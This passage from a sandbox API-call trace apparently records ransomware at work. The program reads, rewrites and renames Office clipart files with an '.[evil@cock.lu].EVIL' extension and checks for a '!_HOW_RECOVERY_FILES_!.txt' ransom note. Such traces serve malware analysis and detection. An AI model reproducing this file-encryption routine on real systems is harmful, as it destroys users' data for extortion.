dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.275] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc37e, lpOverlapped=0x0) returned 1 [0151.284] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.284] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.284] _errno () returned 0x84b1160840 [0151.285] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.285] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xc380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc380, lpOverlapped=0x0) returned 1 [0151.285] CloseHandle (hObject=0x1a8) returned 1 [0151.285] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.285] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.285] __uncaught_exception () returned 0x84b1160800 [0151.285] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.286] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf.[evil@cock.lu].evil")) returned 1 [0151.287] ??_V@YAXPEAX@Z () returned 0x1 [0151.290] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF", dwFileAttributes=0x200) returned 0 [0151.290] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.290] wcsstr (_Str="J0199423.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.290] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 69 [0151.290] wcscmp (_String1="J0199423.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.290] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199423.WMF") returned 0x0 [0151.290] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF") returned 0x45 [0151.290] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.293] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x662a, lpOverlapped=0x0) returned 1 [0151.302] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.302] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.302] _errno () returned 0x84b1160840 [0151.302] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.302] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x6640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6640, lpOverlapped=0x0) returned 1 [0151.303] CloseHandle (hObject=0x1a8) returned 1 [0151.303] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.303] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.303] __uncaught_exception () returned 0x84b1160800 [0151.303] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.303] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf.[evil@cock.lu].evil")) returned 1 [0151.304] ??_V@YAXPEAX@Z () returned 0x1 [0151.308] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF", dwFileAttributes=0x200) returned 0 [0151.308] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.308] wcsstr (_Str="J0199429.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.308] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 69 [0151.308] wcscmp (_String1="J0199429.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.308] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199429.WMF") returned 0x0 [0151.308] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF") returned 0x45 [0151.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.310] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4124, lpOverlapped=0x0) returned 1 [0151.319] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.319] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.319] _errno () returned 0x84b1160840 [0151.319] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.319] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4140, lpOverlapped=0x0) returned 1 [0151.319] CloseHandle (hObject=0x1a8) returned 1 [0151.319] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.320] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.320] __uncaught_exception () returned 0x84b1160800 [0151.320] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.320] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf.[evil@cock.lu].evil")) returned 1 [0151.321] ??_V@YAXPEAX@Z () returned 0x1 [0151.324] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF", dwFileAttributes=0x200) returned 0 [0151.324] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.324] wcsstr (_Str="J0199465.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.325] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 69 [0151.325] wcscmp (_String1="J0199465.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.325] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199465.WMF") returned 0x0 [0151.325] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF") returned 0x45 [0151.325] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.327] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13c4, lpOverlapped=0x0) returned 1 [0151.336] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.336] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.336] _errno () returned 0x84b1160840 [0151.336] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.336] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13e0, lpOverlapped=0x0) returned 1 [0151.336] CloseHandle (hObject=0x1a8) returned 1 [0151.336] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.337] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.337] __uncaught_exception () returned 0x84b1160800 [0151.337] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.337] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf.[evil@cock.lu].evil")) returned 1 [0151.338] ??_V@YAXPEAX@Z () returned 0x1 [0151.341] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF", dwFileAttributes=0x200) returned 0 [0151.341] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.341] wcsstr (_Str="J0199469.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.341] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 69 [0151.341] wcscmp (_String1="J0199469.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.341] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199469.WMF") returned 0x0 [0151.342] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF") returned 0x45 [0151.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.344] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x35bc, lpOverlapped=0x0) returned 1 [0151.720] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.720] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.720] _errno () returned 0x84b1160840 [0151.720] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.721] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x35c0, lpOverlapped=0x0) returned 1 [0151.721] CloseHandle (hObject=0x1a8) returned 1 [0151.721] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.721] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.721] __uncaught_exception () returned 0x84b1160800 [0151.721] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.722] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf.[evil@cock.lu].evil")) returned 1 [0151.723] ??_V@YAXPEAX@Z () returned 0x1 [0151.727] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF", dwFileAttributes=0x200) returned 0 [0151.727] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.727] wcsstr (_Str="J0199473.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.727] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 69 [0151.727] wcscmp (_String1="J0199473.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.727] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199473.WMF") returned 0x0 [0151.727] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF") returned 0x45 [0151.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.729] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a18, lpOverlapped=0x0) returned 1 [0151.732] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.732] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.733] _errno () returned 0x84b1160840 [0151.733] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.733] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a20, lpOverlapped=0x0) returned 1 [0151.733] CloseHandle (hObject=0x1a8) returned 1 [0151.733] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.733] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.733] __uncaught_exception () returned 0x84b1160800 [0151.733] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.734] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf.[evil@cock.lu].evil")) returned 1 [0151.735] ??_V@YAXPEAX@Z () returned 0x1 [0151.738] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF", dwFileAttributes=0x200) returned 0 [0151.738] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.738] wcsstr (_Str="J0199475.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.739] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 69 [0151.739] wcscmp (_String1="J0199475.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.739] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199475.WMF") returned 0x0 [0151.739] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF") returned 0x45 [0151.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.741] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1484, lpOverlapped=0x0) returned 1 [0151.744] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.744] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.744] _errno () returned 0x84b1160840 [0151.744] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.744] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0151.744] CloseHandle (hObject=0x1a8) returned 1 [0151.744] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.745] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.745] __uncaught_exception () returned 0x84b1160800 [0151.745] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.745] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf.[evil@cock.lu].evil")) returned 1 [0151.746] ??_V@YAXPEAX@Z () returned 0x1 [0151.749] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF", dwFileAttributes=0x200) returned 0 [0151.749] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.749] wcsstr (_Str="J0199483.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.749] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 69 [0151.749] wcscmp (_String1="J0199483.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.749] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199483.WMF") returned 0x0 [0151.749] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF") returned 0x45 [0151.750] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.752] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27b4, lpOverlapped=0x0) returned 1 [0151.755] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.755] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.755] _errno () returned 0x84b1160840 [0151.755] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.755] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27c0, lpOverlapped=0x0) returned 1 [0151.756] CloseHandle (hObject=0x1a8) returned 1 [0151.756] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0151.756] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0151.756] __uncaught_exception () returned 0x84b1160800 [0151.756] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0151.756] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf.[evil@cock.lu].evil")) returned 1 [0151.757] ??_V@YAXPEAX@Z () returned 0x1 [0151.761] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF", dwFileAttributes=0x200) returned 0 [0151.761] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0151.761] wcsstr (_Str="J0199609.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0151.761] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 69 [0151.761] wcscmp (_String1="J0199609.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0151.761] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0199609.WMF") returned 0x0 [0151.761] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF") returned 0x45 [0151.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.763] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x302c, lpOverlapped=0x0) returned 1 [0151.766] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.766] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0151.767] _errno () returned 0x84b1160840 